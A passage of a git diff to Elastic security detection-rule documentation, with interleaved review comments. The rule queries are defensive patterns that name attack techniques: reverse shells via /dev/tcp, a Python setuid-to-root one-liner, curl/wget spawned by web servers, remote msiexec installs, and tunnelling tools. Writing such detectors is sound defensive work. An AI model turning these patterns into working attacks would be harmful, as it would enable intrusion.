linux.advanced.capture_env_vars variable should be set to "GLIBC_TUNABLES". -- Click Save. -After saving the integration change, the Elastic Agents running this policy will be updated and -the rule will function properly. -For more information on capturing environment variables refer - https://www.elastic.co/guide/en/security/current/environment-variable-capture.html ----------------------------------- - ==== Rule query 
diff --git a/docs/detections/prebuilt-rules/rule-details/potential-privilege-escalation-via-installerfiletakeover.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-privilege-escalation-via-installerfiletakeover.asciidoc index 7a97fd8ae0..96893c8c42 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-privilege-escalation-via-installerfiletakeover.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-privilege-escalation-via-installerfiletakeover.asciidoc @@ -7,9 +7,7 @@ Identifies a potential exploitation of InstallerTakeOver (CVE-2021-41379) defaul *Rule indices*: -* winlogbeat-* * logs-endpoint.events.* -* logs-windows.* *Severity*: high @@ -35,7 +33,7 @@ Identifies a potential exploitation of InstallerTakeOver (CVE-2021-41379) defaul * Use Case: Vulnerability * Data Source: Elastic Defend -*Version*: 107 +*Version*: 108 *Rule authors*: @@ -110,17 +108,22 @@ This rule detects the default execution of the PoC, which overwrites the `elevat [source, js] ---------------------------------- -/* This rule is compatible with both Sysmon and Elastic Endpoint */ - process where host.os.type == "windows" and event.type == "start" and - (?process.Ext.token.integrity_level_name : "System" or - ?winlog.event_data.IntegrityLevel : "System") and + process.Ext.token.integrity_level_name : "System" and ( (process.name : "elevation_service.exe" and not process.pe.original_file_name == "elevation_service.exe") or + + (process.name : "elevation_service.exe" and + not process.code_signature.trusted == true) or (process.parent.name : "elevation_service.exe" and process.name : ("rundll32.exe", "cmd.exe", "powershell.exe")) + ) and + not + ( + process.name : "elevation_service.exe" and process.code_signature.trusted == true and + process.pe.original_file_name == null ) ---------------------------------- 
diff --git a/docs/detections/prebuilt-rules/rule-details/potential-privilege-escalation-via-overlayfs.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-privilege-escalation-via-overlayfs.asciidoc index 174b60991d..59057344ed 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-privilege-escalation-via-overlayfs.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-privilege-escalation-via-overlayfs.asciidoc @@ -33,7 +33,7 @@ Identifies an attempt to exploit a local privilege escalation (CVE-2023-2640 and * Use Case: Vulnerability * Data Source: Elastic Defend -*Version*: 2 +*Version*: 3 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/potential-privilege-escalation-via-pkexec.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-privilege-escalation-via-pkexec.asciidoc index 989681a3e8..113090637c 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-privilege-escalation-via-pkexec.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-privilege-escalation-via-pkexec.asciidoc @@ -35,7 +35,7 @@ Identifies an attempt to exploit a local privilege escalation in polkit pkexec ( * Use Case: Vulnerability * Data Source: Elastic Defend -*Version*: 105 +*Version*: 106 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/potential-privilege-escalation-via-python-cap-setuid.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-privilege-escalation-via-python-cap-setuid.asciidoc new file mode 100644 index 0000000000..10519d6ed0 --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/potential-privilege-escalation-via-python-cap-setuid.asciidoc 
@@ -0,0 +1,71 @@ +[[potential-privilege-escalation-via-python-cap-setuid]] +=== Potential Privilege Escalation via Python cap_setuid + +This detection rule monitors for the execution of a system command with setuid or setgid capabilities via Python, followed by a uid or gid change to the root user. This sequence of events may indicate successful privilege escalation. Setuid (Set User ID) and setgid (Set Group ID) are Unix-like OS features that enable processes to run with elevated privileges, based on the file owner or group. Threat actors can exploit these attributes to escalate privileges to the privileges that are set on the binary that is being executed. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Privilege Escalation +* Data Source: Elastic Defend + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +sequence by host.id, process.entity_id with maxspan=1s + [process where host.os.type == "linux" and event.action == "exec" and event.type == "start" and + process.args : "import os;os.set?id(0);os.system(*)" and process.args : "*python*" and user.id != "0"] + [process where host.os.type == "linux" and event.action in ("uid_change", "gid_change") and event.type == "change" and + (user.id == "0" or group.id == "0")] + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Exploitation for Privilege Escalation +** ID: T1068 +** 
Reference URL: https://attack.mitre.org/techniques/T1068/ +* Technique: +** Name: Abuse Elevation Control Mechanism +** ID: T1548 +** Reference URL: https://attack.mitre.org/techniques/T1548/ +* Sub-technique: +** Name: Setuid and Setgid +** ID: T1548.001 +** Reference URL: https://attack.mitre.org/techniques/T1548/001/ diff --git a/docs/detections/prebuilt-rules/rule-details/potential-privilege-escalation-via-recently-compiled-executable.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-privilege-escalation-via-recently-compiled-executable.asciidoc index 569c9159c7..4ec142de40 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-privilege-escalation-via-recently-compiled-executable.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-privilege-escalation-via-recently-compiled-executable.asciidoc @@ -30,7 +30,7 @@ This rule monitors a sequence involving a program compilation event followed by * Use Case: Vulnerability * Data Source: Elastic Defend -*Version*: 1 +*Version*: 2 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/potential-privilege-escalation-via-uid-int-max-bug-detected.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-privilege-escalation-via-uid-int-max-bug-detected.asciidoc index 024df7dbbf..2b4374bf9b 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-privilege-escalation-via-uid-int-max-bug-detected.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-privilege-escalation-via-uid-int-max-bug-detected.asciidoc @@ -33,7 +33,7 @@ This rule monitors for the execution of the systemd-run command by a user with a * Tactic: Privilege Escalation * Data Source: Elastic Defend -*Version*: 2 +*Version*: 3 *Rule authors*: 
diff --git a/docs/detections/prebuilt-rules/rule-details/potential-privileged-escalation-via-samaccountname-spoofing.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-privileged-escalation-via-samaccountname-spoofing.asciidoc index b9ce1008b7..5afe2bac41 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-privileged-escalation-via-samaccountname-spoofing.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-privileged-escalation-via-samaccountname-spoofing.asciidoc @@ -40,7 +40,7 @@ Identifies a suspicious computer account name rename event, which may indicate a * Data Source: Active Directory * Use Case: Vulnerability -*Version*: 105 +*Version*: 106 *Rule authors*: @@ -75,6 +75,10 @@ iam where event.action == "renamed-user-account" and ** ID: TA0004 ** Reference URL: https://attack.mitre.org/tactics/TA0004/ * Technique: +** Name: Exploitation for Privilege Escalation +** ID: T1068 +** Reference URL: https://attack.mitre.org/techniques/T1068/ +* Technique: ** Name: Valid Accounts ** ID: T1078 ** Reference URL: https://attack.mitre.org/techniques/T1078/ diff --git a/docs/detections/prebuilt-rules/rule-details/potential-process-injection-from-malicious-document.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-process-injection-from-malicious-document.asciidoc new file mode 100644 index 0000000000..b47f984824 --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/potential-process-injection-from-malicious-document.asciidoc 
@@ -0,0 +1,93 @@ +[[potential-process-injection-from-malicious-document]] +=== Potential Process Injection from Malicious Document + +Identifies child processes of frequently targeted Microsoft Office applications (Word, PowerPoint, Excel) with unusual process arguments and path. This behavior is often observed during exploitation of Office applications or from documents with malicious macros. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 60m + +*Searches indices from*: now-119m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Tactic: Privilege Escalation +* Tactic: Initial Access +* Rule Type: BBR +* Data Source: Elastic Defend + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.action == "start" and + process.parent.name : ("excel.exe", "powerpnt.exe", "winword.exe") and + process.args_count == 1 and + process.executable : ( + "?:\\Windows\\SysWOW64\\*.exe", "?:\\Windows\\system32\\*.exe" + ) and + not (process.executable : "?:\\Windows\\System32\\spool\\drivers\\x64\\*" and + process.code_signature.trusted == true and not process.code_signature.subject_name : "Microsoft *") and + not process.executable : ( + "?:\\Windows\\Sys*\\Taskmgr.exe", + "?:\\Windows\\Sys*\\ctfmon.exe", + "?:\\Windows\\System32\\notepad.exe") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Process Injection +** ID: T1055 +** Reference URL: 
https://attack.mitre.org/techniques/T1055/ +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Process Injection +** ID: T1055 +** Reference URL: https://attack.mitre.org/techniques/T1055/ +* Tactic: +** Name: Initial Access +** ID: TA0001 +** Reference URL: https://attack.mitre.org/tactics/TA0001/ +* Technique: +** Name: Phishing +** ID: T1566 +** Reference URL: https://attack.mitre.org/techniques/T1566/ +* Sub-technique: +** Name: Spearphishing Attachment +** ID: T1566.001 +** Reference URL: https://attack.mitre.org/techniques/T1566/001/ diff --git a/docs/detections/prebuilt-rules/rule-details/potential-process-injection-via-powershell.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-process-injection-via-powershell.asciidoc index 2a6f307c34..47ee70ae2a 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-process-injection-via-powershell.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-process-injection-via-powershell.asciidoc @@ -33,10 +33,11 @@ Detects the use of Windows API functions that are commonly abused by malware and * OS: Windows * Use Case: Threat Detection * Tactic: Defense Evasion +* Tactic: Execution * Resources: Investigation Guide * Data Source: PowerShell Logs -*Version*: 107 +*Version*: 108 *Rule authors*: 
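Review bot: the trailing exclusion list in the Potential Process Injection from Malicious Document query is inconsistent about WOW64. `?:\\Windows\\Sys*\\Taskmgr.exe` and `?:\\Windows\\Sys*\\ctfmon.exe` cover both System32 and SysWOW64, but `?:\\Windows\\System32\\notepad.exe` covers only the 64-bit path. A 32-bit Office build is subject to WOW64 file system redirection, so Notepad launched from it runs as `?:\\Windows\\SysWOW64\\notepad.exe` and still alerts; use `?:\\Windows\\Sys*\\notepad.exe` if Notepad is meant to be excluded in both cases. Separately, the rule is tagged Privilege Escalation and mapped to T1055, but the query only sees an argument-less child (`process.args_count == 1`) under Office; the description should say that injection is inferred from that pattern, not observed.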
@@ -124,3 +125,19 @@ event.category:process and host.os.type:windows and ** Name: Portable Executable Injection ** ID: T1055.002 ** Reference URL: https://attack.mitre.org/techniques/T1055/002/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: PowerShell +** ID: T1059.001 +** Reference URL: https://attack.mitre.org/techniques/T1059/001/ +* Technique: +** Name: Native API +** ID: T1106 +** Reference URL: https://attack.mitre.org/techniques/T1106/ diff --git a/docs/detections/prebuilt-rules/rule-details/potential-protocol-tunneling-via-chisel-client.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-protocol-tunneling-via-chisel-client.asciidoc index c2b168c285..6e34e734ff 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-protocol-tunneling-via-chisel-client.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-protocol-tunneling-via-chisel-client.asciidoc @@ -32,7 +32,7 @@ This rule monitors for common command line flags leveraged by the Chisel client * Tactic: Command and Control * Data Source: Elastic Defend -*Version*: 1 +*Version*: 2 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/potential-protocol-tunneling-via-chisel-server.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-protocol-tunneling-via-chisel-server.asciidoc index 7459f5b794..cf2f7c0274 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-protocol-tunneling-via-chisel-server.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-protocol-tunneling-via-chisel-server.asciidoc @@ -32,7 +32,7 @@ This rule monitors for common command line flags leveraged by the Chisel server * Tactic: Command and Control * Data Source: Elastic Defend -*Version*: 1 +*Version*: 2 *Rule authors*: 
diff --git a/docs/detections/prebuilt-rules/rule-details/potential-protocol-tunneling-via-earthworm.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-protocol-tunneling-via-earthworm.asciidoc index 127a4da297..1ccf11064e 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-protocol-tunneling-via-earthworm.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-protocol-tunneling-via-earthworm.asciidoc @@ -35,7 +35,7 @@ Identifies the execution of the EarthWorm tunneler. Adversaries may tunnel netwo * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 106 +*Version*: 107 *Rule authors*: 
@@ -44,47 +44,6 @@ Identifies the execution of the EarthWorm tunneler. Adversaries may tunnel netwo *Rule license*: Elastic License v2 -==== Investigation guide - - -[source, markdown] ----------------------------------- -### Elastic Defend Integration Setup -Elastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows -the Elastic Agent to monitor events on your host and send data to the Elastic Security app. - -#### Prerequisite Requirements: -- Fleet is required for Elastic Defend. -- To configure Fleet Server refer to the {security-guide}/fleet/current/fleet-server.html[documentation]. - -#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System: -- Go to the Kibana home page and click Add integrations. -- In the query bar, search for Elastic Defend and select the integration to see more details about it. -- Click Add Elastic Defend. -- Configure the integration name and optionally add a description. -- Select the type of environment you want to protect, either Traditional Endpoints or Cloud Workloads. -- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. {security-guide}/security/current/configure-endpoint-integration-policy.html[Helper guide]. -- We suggest to select "Complete EDR (Endpoint Detection and Response)" as a configuration setting, that provides "All events; all preventions" -- Enter a name for the agent policy in New agent policy name. If other agent policies already exist, you can click the Existing hosts tab and select an existing policy instead. -For more details on Elastic Agent configuration settings, refer to the {security-guide}/fleet/8.10/agent-policy.html[helper guide]. -- Click Save and Continue. 
-- To complete the integration, select Add Elastic Agent to your hosts and continue to the next section to install the Elastic Agent on your hosts. -For more details on Elastic Defend refer to the {security-guide}/security/current/install-endpoint.html[helper guide]. - -### Auditbeat Setup -Auditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations. - -#### The following steps should be executed in order to add the Auditbeat for Linux System: -- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages. -- To install the APT and YUM repositories follow the setup instructions in this {security-guide}/beats/auditbeat/current/setup-repositories.html[helper guide]. -- To run Auditbeat on Docker follow the setup instructions in the {security-guide}/beats/auditbeat/current/running-on-docker.html[helper guide]. -- To run Auditbeat on Kubernetes follow the setup instructions in the {security-guide}/beats/auditbeat/current/running-on-kubernetes.html[helper guide]. -- For complete Setup and Run Auditbeat information refer to the {security-guide}/beats/auditbeat/current/setting-up-and-running.html[helper guide]. - -#### Custom Ingest Pipeline -For versions <8.2, you need to add a custom ingest pipeline to populate `event.ingested` with @timestamp for non-elastic-agent indexes, like auditbeats/filebeat/winlogbeat etc. For more details to add a custom ingest pipeline refer to the {security-guide}/fleet/current/data-streams-pipeline-tutorial.html[guide]. ----------------------------------- - ==== Rule query 
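Review bot: dropping the Investigation guide from potential-protocol-tunneling-via-earthworm removes the only setup text for the rule's two data sources (Elastic Defend and Auditbeat), including the note that stacks older than 8.2 need a custom ingest pipeline to populate `event.ingested` for Beats indices. The tag block in this hunk carries no `Resources: Investigation Guide` entry, so nothing dangles, but if this material moved to a separate setup field it should be linked from the rule page; otherwise a reader of the 8.10.5 docs cannot learn that the Auditbeat path needs the pipeline.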
diff --git a/docs/detections/prebuilt-rules/rule-details/potential-pspy-process-monitoring-detected.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-pspy-process-monitoring-detected.asciidoc index 1018052ead..1f46761295 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-pspy-process-monitoring-detected.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-pspy-process-monitoring-detected.asciidoc @@ -30,7 +30,7 @@ This rule leverages auditd to monitor for processes scanning different processes * Use Case: Threat Detection * Tactic: Discovery -*Version*: 2 +*Version*: 3 *Rule authors*: 
@@ -39,32 +39,6 @@ This rule leverages auditd to monitor for processes scanning different processes *Rule license*: Elastic License v2 -==== Investigation guide - - -[source, markdown] ----------------------------------- -### Auditd Manager Integration Setup -The Auditd Manager Integration receives audit events from the Linux Audit Framework which is a part of the Linux kernel. -Auditd Manager provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. - -#### The following steps should be executed in order to add the Elastic Agent System integration "auditd_manager" on a Linux System: -- Go to the Kibana home page and click Add integrations. -- In the query bar, search for Auditd Manager and select the integration to see more details about it. -- Click Add Auditd Manager. -- Configure the integration name and optionally add a description. -- Review optional and advanced settings accordingly. -- Add the newly installed `auditd manager` to an existing or a new agent policy, and deploy the agent on a Linux system from which auditd log files are desirable. -- Click Save and Continue. -- For more details on the integeration refer to the [helper guide](https://docs.elastic.co/integrations/auditd_manager). - -#### Rule Specific Setup Note -Auditd Manager subscribes to the kernel and receives events as they occur without any additional configuration. -However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the "audit rules" configuration box or the "auditd rule files" box by specifying a file to read the audit rules from. 
-- For this detection rule the following additional audit rules are required to be added to the integration: - -- "-w /proc/ -p r -k audit_proc" ----------------------------------- - ==== Rule query diff --git a/docs/detections/prebuilt-rules/rule-details/potential-remote-code-execution-via-web-server.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-remote-code-execution-via-web-server.asciidoc index 5d170dad0d..e38ef0965d 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-remote-code-execution-via-web-server.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-remote-code-execution-via-web-server.asciidoc @@ -37,7 +37,7 @@ Identifies suspicious commands executed via a web server, which may suggest a vu * Resources: Investigation Guide * Data Source: Elastic Defend -*Version*: 4 +*Version*: 5 *Rule authors*: @@ -104,6 +104,7 @@ This rule detects a web server process spawning script and command line interfac - Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. - Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). + ---------------------------------- ==== Rule query @@ -123,7 +124,7 @@ event.action in ("exec", "exec_event") and process.parent.executable : ( "/usr/local/lsws/bin/lswsctrl", "*/bin/catalina.sh" ) and -process.name : ("*sh", "python*", "perl", "php*", "tmux") and +process.name : ("bash", "dash", "ash", "sh", "tcsh", "csh", "zsh", "ksh", "fish", "python*", "perl", "php*", "tmux") and process.args : ("whoami", "id", "uname", "cat", "hostname", "ip", "curl", "wget", "pwd") and not process.name == "phpquery" diff --git a/docs/detections/prebuilt-rules/rule-details/potential-remote-desktop-shadowing-activity.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-remote-desktop-shadowing-activity.asciidoc index b00e3b403f..990389de90 100644 
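Review bot: the removed Investigation guide for potential-pspy-process-monitoring-detected was the only place documenting the mandatory audit rule `-w /proc/ -p r -k audit_proc`. The description still says the rule leverages auditd to monitor for processes scanning other processes, but without that watch the kernel emits no read events for `/proc` and the rule silently never fires. Keep the audit rule requirement on the page (a short note above the Rule query heading would do) or link to wherever it now lives.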
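Review bot: in the potential-remote-code-execution-via-web-server query hunk, replacing `*sh` with an explicit shell list is a good tightening (the wildcard also matched `ssh` and `rsh`), but the list is not the same one used elsewhere in this patch: here and in potential-reverse-shell-via-java it includes `ash`, while potential-reverse-shell and potential-reverse-shell-via-suspicious-child-process use the same list without `ash`. Pick one shell list and reuse it across the Linux rules so coverage does not depend on which rule happens to fire. The other hunk in this file adds a whitespace-only line (`+ `) inside the markdown source block just before its closing fence; drop it.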
--- a/docs/detections/prebuilt-rules/rule-details/potential-remote-desktop-shadowing-activity.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-remote-desktop-shadowing-activity.asciidoc @@ -36,7 +36,7 @@ Identifies the modification of the Remote Desktop Protocol (RDP) Shadow registry * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 105 +*Version*: 106 *Rule authors*: @@ -87,3 +87,7 @@ any where host.os.type == "windows" and ** Name: Remote Services ** ID: T1021 ** Reference URL: https://attack.mitre.org/techniques/T1021/ +* Sub-technique: +** Name: Remote Desktop Protocol +** ID: T1021.001 +** Reference URL: https://attack.mitre.org/techniques/T1021/001/ diff --git a/docs/detections/prebuilt-rules/rule-details/potential-remote-desktop-tunneling-detected.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-remote-desktop-tunneling-detected.asciidoc index e490498110..39fc5a421b 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-remote-desktop-tunneling-detected.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-remote-desktop-tunneling-detected.asciidoc @@ -32,11 +32,12 @@ Identifies potential use of an SSH utility to establish RDP over a reverse SSH T * OS: Windows * Use Case: Threat Detection * Tactic: Command and Control +* Tactic: Lateral Movement * Resources: Investigation Guide * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 106 +*Version*: 107 *Rule authors*: 
@@ -107,3 +108,15 @@ process where host.os.type == "windows" and event.type == "start" and ** Name: Protocol Tunneling ** ID: T1572 ** Reference URL: https://attack.mitre.org/techniques/T1572/ +* Tactic: +** Name: Lateral Movement +** ID: TA0008 +** Reference URL: https://attack.mitre.org/tactics/TA0008/ +* Technique: +** Name: Remote Services +** ID: T1021 +** Reference URL: https://attack.mitre.org/techniques/T1021/ +* Sub-technique: +** Name: SSH +** ID: T1021.004 +** Reference URL: https://attack.mitre.org/techniques/T1021/004/ diff --git a/docs/detections/prebuilt-rules/rule-details/potential-remote-file-execution-via-msiexec.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-remote-file-execution-via-msiexec.asciidoc new file mode 100644 index 0000000000..bf13cebed9 --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/potential-remote-file-execution-via-msiexec.asciidoc 
@@ -0,0 +1,107 @@ +[[potential-remote-file-execution-via-msiexec]] +=== Potential Remote File Execution via MSIEXEC + +Identifies the execution of the built-in Windows Installer, msiexec.exe, to install a remote package. Adversaries may abuse msiexec.exe to launch local or network accessible MSI files. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Initial Access +* Tactic: Defense Evasion +* Rule Type: BBR +* Data Source: Elastic Defend + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +sequence with maxspan=1m + [process where host.os.type == "windows" and event.action == "start" and + process.name : "msiexec.exe" and process.args : "/V"] by process.entity_id + [network where host.os.type == "windows" and process.name : "msiexec.exe" and + event.action == "connection_attempted"] by process.entity_id + [process where host.os.type == "windows" and event.action == "start" and + process.parent.name : "msiexec.exe" and user.id : ("S-1-5-21-*", "S-1-5-12-1-*") and + not process.executable : ("?:\\Windows\\SysWOW64\\msiexec.exe", + "?:\\Windows\\System32\\msiexec.exe", + "?:\\Windows\\System32\\srtasks.exe", + "?:\\Windows\\SysWOW64\\srtasks.exe", + "?:\\Windows\\System32\\taskkill.exe", + "?:\\Windows\\Installer\\MSI*.tmp", + "?:\\Program Files\\*.exe", + "?:\\Program Files (x86)\\*.exe", + "?:\\Windows\\System32\\ie4uinit.exe", + "?:\\Windows\\SysWOW64\\ie4uinit.exe", + "?:\\Windows\\System32\\sc.exe", + "?:\\Windows\\system32\\Wbem\\mofcomp.exe", + 
"?:\\Windows\\twain_32\\fjscan32\\SOP\\crtdmprc.exe", + "?:\\Windows\\SysWOW64\\taskkill.exe", + "?:\\Windows\\SysWOW64\\schtasks.exe", + "?:\\Windows\\system32\\schtasks.exe", + "?:\\Windows\\System32\\sdbinst.exe") and + not (process.code_signature.subject_name == "Citrix Systems, Inc." and process.code_signature.trusted == true) and + not (process.name : ("regsvr32.exe", "powershell.exe", "rundll32.exe", "wscript.exe") and + process.Ext.token.integrity_level_name == "high" and + process.args : ("?:\\Program Files\\*", "?:\\Program Files (x86)\\*")) and + not (process.executable : ("?:\\Program Files\\*.exe", "?:\\Program Files (x86)\\*.exe") and process.code_signature.trusted == true) and + not (process.name : "rundll32.exe" and process.args : "printui.dll,PrintUIEntry") + ] by process.parent.entity_id + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Initial Access +** ID: TA0001 +** Reference URL: https://attack.mitre.org/tactics/TA0001/ +* Technique: +** Name: Phishing +** ID: T1566 +** Reference URL: https://attack.mitre.org/techniques/T1566/ +* Sub-technique: +** Name: Spearphishing Link +** ID: T1566.002 +** Reference URL: https://attack.mitre.org/techniques/T1566/002/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: System Binary Proxy Execution +** ID: T1218 +** Reference URL: https://attack.mitre.org/techniques/T1218/ +* Sub-technique: +** Name: Msiexec +** ID: T1218.007 +** Reference URL: https://attack.mitre.org/techniques/T1218/007/ diff --git a/docs/detections/prebuilt-rules/rule-details/potential-reverse-shell-activity-via-terminal.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-reverse-shell-activity-via-terminal.asciidoc index a3daf552e3..d74b58e508 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-reverse-shell-activity-via-terminal.asciidoc 
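Review bot: in the Potential Remote File Execution via MSIEXEC sequence, the third step filters `user.id : ("S-1-5-21-*", "S-1-5-12-1-*")`. `S-1-5-12` is the well-known Restricted Code SID and is not followed by user RIDs, whereas Azure AD user accounts carry SIDs of the form `S-1-12-1-...`; if the intent is to cover both domain and Azure AD users, the second pattern should be `S-1-12-1-*`, otherwise the sequence never completes on Azure AD joined hosts. Two further points: the exclusion `?:\\Windows\\Installer\\MSI*.tmp` is exactly where Windows Installer extracts embedded custom-action binaries, so a malicious MSI that runs its payload as a custom action is excluded by design and the description should state that limitation; and with `*References*: None` nothing explains why `/V` rather than `/i` with a URL is the trigger argument in the first step, which anyone tuning the rule will need.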
+++ b/docs/detections/prebuilt-rules/rule-details/potential-reverse-shell-activity-via-terminal.asciidoc @@ -36,7 +36,7 @@ Identifies the execution of a shell process with suspicious arguments which may * Resources: Investigation Guide * Data Source: Elastic Defend -*Version*: 105 +*Version*: 106 *Rule authors*: @@ -94,7 +94,9 @@ process where event.type in ("start", "process_started") and /* noisy FPs */ not (process.parent.name : "timeout" and process.executable : "/var/lib/docker/overlay*") and - not process.command_line : ("*/dev/tcp/sirh_db/*", "*/dev/tcp/remoteiot.com/*", "*dev/tcp/elk.stag.one/*", "*dev/tcp/kafka/*", "*/dev/tcp/$0/$1*", "*/dev/tcp/127.*", "*/dev/udp/127.*", "*/dev/tcp/localhost/*") and + not process.command_line : ( + "*/dev/tcp/sirh_db/*", "*/dev/tcp/remoteiot.com/*", "*dev/tcp/elk.stag.one/*", "*dev/tcp/kafka/*", + "*/dev/tcp/$0/$1*", "*/dev/tcp/127.*", "*/dev/udp/127.*", "*/dev/tcp/localhost/*", "*/dev/tcp/itom-vault/*") and not process.parent.command_line : "runc init" ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/potential-reverse-shell-via-background-process.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-reverse-shell-via-background-process.asciidoc index 4620b6e67e..ccbe2f6329 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-reverse-shell-via-background-process.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-reverse-shell-via-background-process.asciidoc @@ -29,7 +29,7 @@ Monitors for the execution of background processes with process arguments capabl * Tactic: Execution * Data Source: Elastic Defend -*Version*: 1 +*Version*: 2 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/potential-reverse-shell-via-java.asciidoc 